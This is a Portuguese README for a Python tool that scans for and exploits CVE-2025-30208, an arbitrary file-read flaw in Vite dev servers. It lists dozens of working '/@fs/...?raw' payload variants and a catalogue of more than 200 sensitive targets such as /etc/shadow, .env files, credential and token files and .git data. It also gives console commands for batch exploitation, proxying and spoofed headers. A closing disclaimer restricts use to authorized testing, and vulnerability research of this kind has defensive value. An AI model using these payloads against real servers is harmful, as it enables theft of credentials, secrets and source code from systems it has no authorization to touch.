
CVE‑2025‑30208 é uma vulnerabilidade de leitura arbitrária de arquivos de gravidade média no servidor de desenvolvimento Vite (uma popular ferramenta de construção frontend)
Scanner de vulnerabilidade avançado para CVE-2025-30208 com recursos de nível empresarial
Ferramenta profissional de teste de penetração para detecção de vulnerabilidade de leitura arbitrária de arquivos do Vite
🚀 Início Rápido • 📋 Recursos • 🔧 Uso • 📊 Exemplos • 🛡️ Segurança
Este é um scanner de vulnerabilidade abrangente projetado para detectar e explorar a vulnerabilidade CVE-2025-30208 em servidores de desenvolvimento Vite. A vulnerabilidade permite acesso de leitura arbitrária de arquivos através dos endpoints do sistema de arquivos do Vite, potencialmente expondo arquivos de configuração sensíveis, código-fonte e informações do sistema.
A ferramenta agora possui uma arquitetura modular para melhor manutenibilidade e extensibilidade:
CVE-2025-30208.py - Aplicação principal do scannerpayloads.py - Payloads de exploração avançados (mais de 60 variações)sensitive_files.py - Banco de dados abrangente de arquivos sensíveis (mais de 200 arquivos)html_template.py - Template aprimorado de relatório HTML no estilo hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Habilitar modo verboso para saída detalhada
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Pressione Enter duas vezes para finalizar]
CVE-2025-30208 > scan
# Configurar proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Definir cabeçalhos personalizados
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configurar limitação de taxa
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Gerar belo relatório HTML
CVE-2025-30208 > pull
# Iniciar servidor web para visualizar relatório
CVE-2025-30208 > web
# Iniciar servidor web em porta específica
CVE-2025-30208 > web 8081
# Parar servidor web
CVE-2025-30208 > web off
O scanner agora usa mais de 60 variações de payload organizadas em payloads.py:
/@fs/{caminho_arquivo}?raw??
/@fs/{caminho_arquivo}?raw&url
/@fs/{caminho_arquivo}?import&raw??
/@fs/{caminho_arquivo}?raw&import
/@fs/{caminho_arquivo}?import&url
/@fs/{caminho_arquivo}?raw&source
/@fs/{caminho_arquivo}?raw&content
/@fs/{caminho_arquivo}?raw&data
/@fs/{caminho_arquivo}?raw&file
/@fs/{caminho_arquivo}?raw&type=text
/@fs/{caminho_arquivo}?raw&format=text
/@fs/{caminho_arquivo}?raw&encoding=utf8
/@fs/{caminho_arquivo}?raw&vite&dev
/@fs/{caminho_arquivo}?raw&vite&hot
/@fs/{caminho_arquivo}?raw&vite&hmr
/@fs/{caminho_arquivo}?raw&development
/@fs/{caminho_arquivo}?raw&debug
/@fs/{caminho_arquivo}?raw&esm
/@fs/{caminho_arquivo}?raw&cjs
/@fs/{caminho_arquivo}?raw&umd
/@fs/{caminho_arquivo}?raw&js
/@fs/{caminho_arquivo}?raw&ts
/@fs/{caminho_arquivo}?raw&json
/@fs/{caminho_arquivo}?raw&css
/@fs/{caminho_arquivo}?raw&html
/app/{caminho_arquivo}?raw??
/App/{caminho_arquivo}?raw??
A ferramenta agora testa mais de 200 arquivos sensíveis organizados em sensitive_files.py:
/etc/passwd - Informações da conta de usuário/etc/shadow - Dados de senha criptografados/etc/services - Serviços de rede/etc/hosts - Mapeamentos de nomes de host/etc/fstab - Tabela do sistema de arquivos/etc/ssh/sshd_config - Configuração do servidor SSH/etc/crontab - Trabalhos cron do sistema/etc/sudoers - Configuração do sudo/proc/version - Versão do kernel/proc/cpuinfo - Informações da CPU/proc/meminfo - Informações da memória/proc/self/environ - Ambiente do processo/proc/self/cmdline - Linha de comando do processo/proc/net/tcp - Conexões TCP/proc/net/udp - Conexões UDP.env - Variáveis de ambiente.env.local - Ambiente local.env.production - Ambiente de produçãoconfig.json - Configuração da aplicaçãosettings.json - Definições da aplicaçãoapplication.properties - Configuração Springapplication.yml - Configuração YAMLdatabase.yml - Configuração do banco de dadossecrets.json - Gerenciamento de segredospackage.json - Dependências Node.jspackage-lock.json - Dependências bloqueadasyarn.lock - Arquivo de bloqueio Yarnvite.config.js - Configuração Vitevite.config.ts - Configuração Vite TypeScripttsconfig.json - Configuração TypeScriptwebpack.config.js - Configuração Webpacknext.config.js - Configuração Next.jsnuxt.config.js - Configuração Nuxt.jsangular.json - Configuração Angularvue.config.js - Configuração Vue.jsrollup.config.js - Configuração Rollupeslint.config.js - Configuração ESLint.git/config - Configuração Git.gitignore - Regras de ignorar Git.gitattributes - Atributos Git.gitmodules - Submódulos Git.git/HEAD - Branch atual.git/logs/HEAD - Logs Git.git/refs/heads/master - Branch master.git/refs/heads/main - Branch mainREADME.md - Documentação do projetoCHANGELOG.md - Registro de alteraçõesLICENSE - Informações de licençaCONTRIBUTING.md - Diretrizes de contribuiçãoAUTHORS - Informações do autorTODO.md - Lista de tarefasROADMAP.md - Roteiro de desenvolvimentoDockerfile - Configuração Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - Configuração de sobreposição.dockerignore - Regras de ignorar Dockerdocker-compose.prod.yml - Configuração de produçãodocker-compose.dev.yml - Configuração de desenvolvimentonginx.conf - Configuração Nginxapache2.conf - Configuração Apachehttpd.conf - Configuração do daemon HTTP.htaccess - Controle de acesso Apacheweb.config - Configuração IISrobots.txt - Diretivas para motores de buscasitemap.xml - Estrutura do sitemanifest.json - Manifesto do aplicativo websw.js - Service workerfirebase.json - Configuração Firebasefirebase.rules - Regras de segurança Firebaseboot.ini - Configuração de inicializaçãoautoexec.bat - Script de execução automáticasystem.ini - Configuração do sistemawin.ini - Configuração do WindowsUsers - Diretórios de usuáriosWindows - Arquivos do sistemaProgram Files - Diretórios de aplicativosSystem - Arquivos do sistemaLibrary - Arquivos de bibliotecaApplications - Arquivos de aplicativosprivate/etc/hosts - Arquivo hostsprivate/etc/passwd - Contas de usuáriodatabase.db - Banco de dados SQLitedatabase.sqlite - Banco de dados SQLitedata.db - Banco de dados de dadosdump.sql - Despejo de banco de dadosschema.sql - Esquema do banco de dadosmigrations - Migrações de banco de dadoslogs - Diretório de logserror.log - Logs de erroaccess.log - Logs de acessoapp.log - Logs da aplicaçãodebug.log - Logs de depuraçãocombined.log - Logs combinadosbackup - Diretório de backupbackup.sql - Backup de banco de dadosbackup.zip - Backup compactadodump - Despejo de dadosexport - Exportação de dadosauth.json - Configuração de autenticaçãocredentials.json - Armazenamento de credenciaiskeys.json - Gerenciamento de chavestokens.json - Armazenamento de tokensjwt.json - Configuração JWToauth.json - Configuração OAuthapi.json - Configuração de APIswagger.json - Documentação da APIopenapi.json - Especificação OpenAPIgraphql.json - Configuração GraphQLschema.json - Esquema da APIcloudformation.yml - AWS CloudFormationserverless.yml - Configuração Serverlessterraform.tf - Configuração Terraformkubernetes.yml - Configuração Kubernetesk8s.yml - Configuração Kubernetesanalytics.json - Configuração de análisemonitoring.json - Configuração de monitoramentometrics.json - Configuração de métricastelemetry.json - Dados de telemetriaA ferramenta agora gera belos relatórios HTML no estilo hacker com:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Aplicação principal do scanner
├── payloads.py # Payloads de exploração avançados (mais de 60)
├── sensitive_files.py # Banco de dados de arquivos sensíveis (mais de 200)
├── html_template.py # Template de relatório HTML aprimorado
├── README.md # Esta documentação
├── requirements.txt # Dependências Python
├── logs/ # Diretório de arquivos de log
├── data_leak.html # Relatórios HTML gerados
├── data_leak.json # Relatórios JSON gerados
└── session.json # Configurações de sessão salvas
Recebemos contribuições para melhorar esta ferramenta:
payloads.pysensitive_files.pyhtml_template.pyEste projeto está licenciado para propósitos educacionais e de teste de segurança autorizados apenas.
⚠️ Aviso Legal: Esta ferramenta é destinada apenas para testes de segurança autorizados e fins de pesquisa. Os usuários são responsáveis por garantir que possuem autorização adequada antes de testar qualquer sistema. Os autores não são responsáveis por qualquer uso indevido desta ferramenta.
⭐ Se esta ferramenta ajudou você, dê uma estrela! ⭐
Construído com ❤️ para a comunidade de segurança
| Comando | Descrição | Exemplo |
|---|
set <opção> <valor> | Definir opções de configuração | set RHOST 192.168.1.100 |
show options | Exibir configurações atuais | show options |
edit | Editor interativo de opções | edit |
run / exploit | Executar teste de vulnerabilidade | run |
batch | Varredura em lote de múltiplos alvos | batch |
scan | Descobrir arquivos sensíveis | scan |
pull | Exportar resultados para HTML/JSON | pull |
web [on|off|porta] | Servidor web para relatórios HTML | web 8080 |
save | Salvar configuração da sessão | save |
load | Carregar configuração da sessão | load |
test | Testar conectividade com o alvo | test |
validate | Validar configuração atual | validate |
verbose | Alternar modo verboso | verbose |
proxy | Configurar definições de proxy | proxy |
headers | Definir cabeçalhos HTTP personalizados | headers |
rate | Configurar limitação de taxa | rate |
log | Mostrar informações de log | log |
help / ? | Mostrar ajuda | help |
exit / quit | Sair da ferramenta | exit |
| Opção | Descrição | Padrão | Validação |
|---|
RHOST | Host/IP alvo | - | Validação de hostname/IP |
RPORT | Número da porta alvo | - | Faixa de porta (1-65535) |
FILEPATH | Caminho do arquivo a testar | etc/passwd | Validação de caminho |
PROXY | URL do proxy HTTP/HTTPS | - | Validação de formato de URL |
VERBOSE | Habilitar saída verbosa | false | Validação booleana |
RATE_LIMIT | Atraso entre requisições (segundos) | 0.3 | Validação numérica |
THREADS | Número de threads para varredura em lote | 5 | Validação de inteiro |
TIMEOUT | Timeout da requisição (segundos) | 5 | Validação de inteiro |
CUSTOM_HEADERS | Cabeçalhos HTTP personalizados (JSON) | {} | Validação de formato JSON |
prettier.config.js - Configuração Prettierjest.config.js - Configuração Jestbabel.config.js - Configuração Babeltailwind.config.js - Configuração Tailwind CSS| Arquivo | Descrição | Formato |
|---|
data_leak.html | Relatório de vulnerabilidade HTML aprimorado no estilo hacker | HTML |
data_leak.json | Exportação JSON estruturada | JSON |
sensitive_files_discovery.json | Arquivos sensíveis descobertos | JSON |
session.json | Configuração de sessão salva | JSON |
logs/cve_2025_30208_AAAAMMDD_HHMMSS.log | Logs de auditoria detalhados | Texto |